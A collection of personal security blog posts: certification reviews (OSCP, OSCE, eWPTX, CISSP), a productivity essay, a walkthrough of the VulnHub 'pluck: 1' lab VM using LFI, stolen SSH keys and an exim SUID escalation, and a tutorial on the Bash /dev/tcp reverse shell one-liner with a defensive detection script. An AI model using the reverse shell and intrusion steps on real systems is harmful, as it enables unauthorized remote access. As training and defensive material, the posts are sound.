OSCE Review

Hi There,

Ever since passing the OSCP exam I was thinking of taking the CTP course. However, it was not a priority at that time since I had to focus on web stuff. But in the last few months I had free time to do it.

As usual, to register for the course you have to solve the challenge at http://www.fc4.me/. I was able to solve the first part easily; however, the second part was a reality check for me, since I had not read/written *value* for years and I don't do reverse stuff on a daily basis.

I went ahead and started preparing for the course following Tulpa's guide https://tulpa-security.com/2017/07/18/288/, which was excellent. At the same time I practiced VulnServer extensively; it's really a good piece of code to practice on and understand different scenarios.

After 2 months of preparing and practicing I felt ready and registered for the course. The course content is small but specific and expects the student to be familiar with the terms used in the course materials. I finished reading the materials quickly and started solving the lab boxes. The course is really outdated; however, the concepts presented are fundamental and you can apply them to modern systems with little difference.

I booked the exam after finishing the 1 month of lab time. I can't say much about the exam except that you are expected to research during the exam and try different tricks to get results. The 48 hours is enough to solve the exam if you manage your time properly and understand the exam objectives clearly.

In the end I did enjoy doing the course, although I don't do reverse engineering daily. But the course does fill a big gap in understanding how certain important types of attacks happen.

eWPTX Review

Hello There,

In this post I will talk about my experience with the eWPTX certificate.

I registered for this course since I was looking for advanced training in web hacking; eWPTX was the best option out there after reading the syllabus.

Registration went smoothly; there is no waiting queue like OSCP. Pay and start the course instantly!


The materials are very good and cover many topics in detail. However, I found it annoying that many slides contain only a few lines of text; this could be rearranged and presented in a better way. But I like the option to read the materials in many forms like PDF, HTML5 or Flash.

The materials cover XSS, CSRF, SQLi and XML attacks, but what makes this course interesting is the use of evasion and obfuscation techniques to carry out successful attacks. That's why it's important to study and focus on the first portion of the materials, which talks about the different encodings used on the web.


The lab was great! Well maintained with many nice features. The lab is isolated, so each student has his own scenario to test and practice. Course topics are divided into separate labs with many small tasks to be tested. Also, there are solutions provided for each lab in case the student needs them.


The student can start the exam at any time. I decided to start mine after 3 months of reading the materials and practicing in the labs.

The exam is quite nice. You are tasked to take a black box approach to a small web app. There are no specific tasks assigned; you have to find as many vulnerabilities as you can in a one week time frame.

It was a great/frustrating experience :) I kept coming back to the web app every day and questioning everything until the last day. After that you have one week to write the report and submit it; I did the writing/review in 2 days.

After 3 weeks I received the pass email.


The eWPTX is a great course; I learned many new topics like 2nd order SQLi and how to make the best of tools like SQLMap.

However, I think eLS should maintain the course; many typos have existed since 2014 and some of the provided solutions for labs do not work and need to be checked.

But this will not affect the course, and anyone interested in advanced web hacking will find this course great.






CISSP Review

Hello There,

In this post I will talk about my experience with the CISSP certificate, why I studied it and how I managed to get certified.


After finishing the OSCP certificate I started studying CISSP the next day; it was in my plan to study CISSP right after finishing OSCP. I felt that I needed to read/study about information security from a managerial level with a bird's-eye view. Many people look down on CISSP and think it's useless; however, I can assure you that the materials in CISSP are really good and can be beneficial for anyone who wants to know more about information security from a managing position.

Study Plan:

For studying the materials I focused on books only; I hate videos and thought they were unnecessary since the course is theoretical and no hands-on is required.

Below is the list of books I used:

In total I spent 4 months reading and studying the materials; this is what I did during this period:

  • I was not in a hurry, so I spent 2.5 months reading the official study guide. It's 1000 pages, and I was reading for 1-2 hours during the workdays and resting at weekends.
  • After finishing the official guide I started reading the 11th Hour book and finished it in one week to recap what I had learned in the official guide.
  • Next I started solving the practice test kits, but only the questions focused on domains; there are 8 chapters with 100 questions associated with each domain.
  • After knowing my weak points I started reading the CISSP Study Guide by Eric Conrad. It's a fantastic guide! I wish I had started with it in the beginning; however, I read it fast since I was already done with the official guide. I was also taking notes on the hard things, since Mr. Conrad's way of illustrating things is great.
  • Back again to solve the rest of the practice test kits, which is 2 full 250-question exams, to test my progress. I still needed to study and improve in some weak areas, and in this step I was solving each question and correcting my answer at the same time.
  • Before the exam I started skimming through the official guide; at the end of each chapter there is a good summary to read. I was also skimming through the practice test kit questions, especially the red flag ones.
  • Before entering the exam room I read my personal notes for the last time and skimmed through the 11th Hour book to memorize the hard stuff.


I can't say much about the exam (NDA), but the questions are not the same as in the practice test kits; they are scenario based and you need to think about the best answer that fits the mentioned case.

I consumed the whole 6 hours of exam time as I evaluated and double checked every question, and did not take any breaks.


After passing the exam you need some CISSP fellow to endorse your application. I did not know anyone, so I chose ISC2. I submitted my papers and exactly 4 weeks later I got the congratulations letter.


I recommend CISSP for anyone interested in information security. I do agree that it's not technical training, and with respectable experience in the field you do not need a certificate to prove yourself. But the materials do serve as a great refresher for anyone working in the field or someone who wants to start in a managing position.


Getting things done: The Cook Model

All of us have projects to be finished, and many people do not continue their projects for different reasons. In this post I will talk about a routine I usually follow to help me finish my projects; I hope you find it useful.

I call this routine The Cook Model. This routine is simple yet effective. Just like any meal you want to prepare, you have to follow 3 phases in sequence to have an enjoyable meal.

1. Prepare:

This is the initial phase and the most important one, I think. In this phase you are hungry and start preparing for the meal by buying the groceries, reading the preparation instructions and so on.

So it is with projects: you have to have the reason why you want to start this project, why it's important for you and what the expected result is.
Your strategy must be clear and defined. Please be honest with yourself and take into consideration all the hurdles you may face and what power or tools can help you.
Take as much time as you want in this phase to do your research, set a plan, buy tools/books, talk to people, look for alternatives and so on.
By finishing this phase you will have an agenda to follow with specific tasks and a time frame.

2. Cook:

Cook your meal! Follow your agenda from phase 1 step by step. You can't change your mind now in the middle of the cooking by taking the chicken off the grill and trying to fry it! You will ruin the whole meal.

This is the action time; you have to follow your agenda step by step and believe in the work you have done in phase 1.
You have to be patient and persistent; it's a one way route and you can't rethink the plan or try to take a detour. This is where most people fail, because they keep questioning their goal/plan and try to start all over again, and by that they start juggling around in the hope of finding a better settlement.
I can sum this phase up in one word: "commitment".


Now that you have done your job, it's time to taste the meal: is it salty? Does it need more time? Or is it just delicious?

In this phase it's not important whether you succeed or fail; be proud of the effort you have made, because you did reach the final destination. Some people get stuck in the previous phases and can't reach this final phase, so it will be an unfinished project for them and they can't enjoy the result or evaluate the failure.
If you succeed then be happy and enjoy your achievement. If not, then there are lessons to be learned from this experience, and you can start all over again by modifying phase 1 and continuing your project.


You only need one person's approval, and this person is you. Take responsibility for your project and quit caring about other people's opinions/experiences.
Most people fail because they get stuck in an infinite loop between phase 1 and 2 due to different reasons (people's opinions / self doubt / circumstances / etc.).
This is a one way route and you have to keep moving forward; don't hesitate or settle for less.

pluck: 1 walk-through

In this post we will walk through the pluck: 1 VM, so let's start!


We will scan all TCP ports along with the top UDP ports.

root@kali:~/vulnhub/pluck# nmap -sS -p- -A --reason  \
> && nmap -sU -sV -A --top-ports 100 \
> && nmap -sU -p 161 \
> && nmap -sU -p 69 

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:32 +03
Nmap scan report for
Host is up, received arp-response (0.0010s latency).
Not shown: 65531 closed ports
Reason: 65531 resets
22/tcp   open  ssh     syn-ack ttl 64 OpenSSH 7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e8:87:ba:3e:d7:43:23:bf:4a:6b:9d:ae:63:14:ea:71 (RSA)
|_  256 8f:8c:ac:8d:e8:cc:f9:0e:89:f7:5d:a0:6c:28:56:fd (ECDSA)
80/tcp   open  http    syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Pluck
3306/tcp open  mysql   syn-ack ttl 64 MySQL (unauthorized)
5355/tcp open  llmnr?  syn-ack ttl 1
MAC Address: 00:0C:29:1E:99:39 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1   1.05 ms

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 125.03 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:34 +03
Nmap scan report for
Host is up (0.00061s latency).
Not shown: 98 closed ports
68/udp open|filtered dhcpc
69/udp open|filtered tftp
MAC Address: 00:0C:29:1E:99:39 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

1   0.61 ms

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 204.24 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:37 +03
Nmap scan report for
Host is up (0.00074s latency).
161/udp closed snmp
MAC Address: 00:0C:29:1E:99:39 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.54 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:37 +03
Nmap scan report for
Host is up (0.00056s latency).
69/udp open|filtered tftp
MAC Address: 00:0C:29:1E:99:39 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.11 seconds

The website on port 80 is powered by PHP. I tried many PHP tricks to check for vulnerabilities and discovered that the site is prone to LFI and the PHP base64-encode trick!

Now we have a list of users:

  • bob
  • peter
  • paul
  • backup-user


I tried to brute-force and SQLi the admin login page, but no luck.

Next I went back to the users list and tried to include the backup script mentioned in the login shell of backup-user.

We can try to include the tar file directly, but this will be a total mess! So let's make use of the PHP base64-encode trick to download the file safely by encoding the data of the backup.tar file, then cutting the HTML around it and decoding it locally.

curl | grep 'jumbotron>' | cut -d '>' -f 2 | cut -d '<' -f 1 > backup.tar64
base64 -d backup.tar64 > backup.tar
mkdir backup ; tar -xvf backup.tar -C backup

After extracting the file we notice the existence of a keys folder containing SSH keys of the user Paul. We will test the keys until we get a valid SSH login.

ssh paul@ -i id_key4

We are presented with a menu-type login shell, in this case Pdmenu. However, we can escape this menu by selecting Edit file and typing any file name to start using vim.

:set shell=/bin/bash

Then type the following to jump to Bash:


Privilege Escalation

I tried to escalate using kernel exploits but no luck. However, after searching for SUIDs we can notice the existence of the exim agent.

paul@pluck:~$ find / -perm -u=s -type f 2>/dev/null

I tried some exploits to escalate privileges using the exim agent, but they did not work for me. However, I decided to give this exploit a shot since the difference in version is minimal, and luckily this exploit works.









And that's it.


OSCP Review


I have been developing software for years; however, I recently had a great chance to switch my career path to the security field, and that's why I started looking for trainings to gain more skills.
Security for a software developer is writing good code, running scanners, setting up firewalls, etc.
But there is still a missing link: how do hackers break into servers, and what tools and techniques do they use?

Enter OffSec:

In my journey to find the right training, I reached OffSec since I was using Kali Linux as a platform to run scanners.
I was skeptical at first, but after reading different reviews I decided to enroll in the PWK course since I am a big fan of Linux and I needed training with hands-on experience to know how hacking happens.


Fast forward after registration: I received the e-mail package and started reading…
Well, I have to say, this is indeed a 101 course, but the topics covered are broad and wide.
OffSec will take you on a journey through all hacking topics; you will know the How and the Why for each concept in a self-learning way.
As Morpheus said: "I'm trying to free your mind, Neo. But I can only show you the door. You're the one that has to walk through it."
I spent two months reading the materials without rushing, to know all the topics and connect the dots before hitting the lab. At the same time I solved the exercises and skipped the ones that required more engagement, to do them later on.


After finishing reading the materials and taking a summer vacation for one month, I was ready to hit the lab.
I have to say the lab is just fantastic! I was overwhelmed and running around like a lost sheep in the first few days, but after that I started enumerating the whole lab network and hacking the low-hanging fruit boxes first.
I spent approximately 3.5 months hacking the lab machines and was able to hack fantastic boxes like PAIN, Sufferance and gh0st. But personally I like dotty.


After hitting 32 boxes, I felt ready to take the exam to test my skills.
My first attempt went badly and I failed; the exam is BRUTAL, but it was an eye-opener and I learned my weaknesses.
I took multiple exam attempts, and with each attempt I was gaining more and more skills. It's a tough process, but the aftermath of it is HUGE; I learned/tuned a lot of things.
If you want to take the exam then you have to be 100% ready for it. 80% or 90% will not be enough; you have to Try Harder and Harder.
On Saturday 25-3-2017 I passed the OSCP exam with a BIG smile. It went smoothly and I was able to finish the exam along with writing the report in the 24 hour time slot.


  • You have to change your mindset; in this course you have to think like a hacker or a breaker, because developers expect the code to work in a certain way but the hacker will try to twist the code to get in.
  • Study and research; you have to read a lot of information and test it to understand what is happening and why.
  • It's simple; sometimes it's plain simple to hack in and you do not have to go deep into the rabbit hole.
  • Set a game plan; know your target very well and spend time reading the enumeration data to set a proper game plan before you start hacking, otherwise you will waste your resources.
  • Practice; download images from Vulnhub.com and practice. I also find the walk-throughs a great way to learn from other people's experience.

Final Thoughts:

I encourage anyone seriously interested in information security or hacking to enroll in the PWK course; the learning curve is steep and you will learn a lot of things in a short amount of time.
You have to dedicate effort/time to this course, otherwise you can't learn or pass the exam.
The community and OffSec people are great and you will learn many new things. I will definitely enroll in other courses and try to engage more in the community.


The below links helped me a lot when I was studying the course:









Bash Reverse Shell

In this post I will talk about a special type of reverse shell. I like this type of shell because mostly you can use tools that already exist on your target.

But before I start talking about the Bash reverse shell in detail, I would like to mention some limitations of this type of shell:

  • You can't use this type of shell against Windows targets since bash is not there.
  • You can't use this type of shell if the Unix-like target does not have the Bash package installed. However, you can use the ancient Bourne shell (sh).

Now all you have to do is set up an nc listener on your attacking machine.

nc -nlvp PORT

Then issue this command on your target.

/bin/bash -i >& /dev/tcp/ATTACKER-IP/ATTACKER-PORT 0>&1

where:

  • ATTACKER-IP is your attacking machine's IP address
  • ATTACKER-PORT is the port used by the nc listener

And that's it! You should have a bash reverse shell by now. This reverse shell works thanks to Bash's built-in handling of /dev/tcp paths and Unix-like file descriptor redirection: the shell itself opens the socket, and stdin, stdout and stderr are redirected to it.

You can replace /bin/bash with /bin/sh if the target machine lacks the bash package.
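The defender's counterpart to the command above, as an added example that is not part of the original post: a small bash check that flags collected command lines using the /dev/tcp or /dev/udp redirection, run over a constructed sample feed (the sample lines and the function names are my own).

```bash
#!/bin/bash
# Added example (not from the original post): flag command lines that use the
# bash /dev/tcp or /dev/udp redirection. bash (and ksh) resolve
# /dev/tcp/HOST/PORT internally and open a socket; the kernel has no such file,
# so a command line containing that path is a strong signal worth reviewing.

# Constructed sample feed: command lines as they might be collected from a
# shell history or a process-creation log. Not real data.
SAMPLE_CMDS='ls -la /var/www
/bin/bash -i >& /dev/tcp/10.0.0.5/4444 0>&1
grep -r "password" /etc
sh -i >& /dev/udp/192.168.1.20/5353 0>&1
echo test > /dev/null
exec 3<>/dev/tcp/203.0.113.7/443
cat /dev/tcp.log'

# Pattern: /dev/tcp or /dev/udp followed by a host and a numeric port.
# Requiring both components keeps a filename like /dev/tcp.log from matching.
DEVTCP_RE='/dev/(tcp|udp)/[^/[:space:]]+/[0-9]+'

# Print "endpoint | command" for every matching line of the input text.
find_devtcp_shells() {
  printf '%s\n' "$1" | grep -E "$DEVTCP_RE" | while IFS= read -r line; do
    endpoint=$(printf '%s\n' "$line" | grep -oE "$DEVTCP_RE" | head -n 1)
    printf '%s | %s\n' "$endpoint" "$line"
  done
}

# Number of flagged lines, handy as a threshold in a scheduled check.
count_devtcp_shells() {
  find_devtcp_shells "$1" | wc -l | tr -d ' '
}

# Usage: run the check over the constructed sample.
find_devtcp_shells "$SAMPLE_CMDS"
```

The same pattern applies to a real feed piped into find_devtcp_shells; a plain sh such as dash does not implement /dev/tcp, so matches on sh command lines still deserve a look but may simply fail on the host.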

Final Thoughts:

As always, you have to enumerate your target to know the environment in front of you. In our case you have to check for the existence of Bash or sh and where it is located.

This post serves as a short note on how to create a Bash reverse shell; please read more about the software or technology used in the references.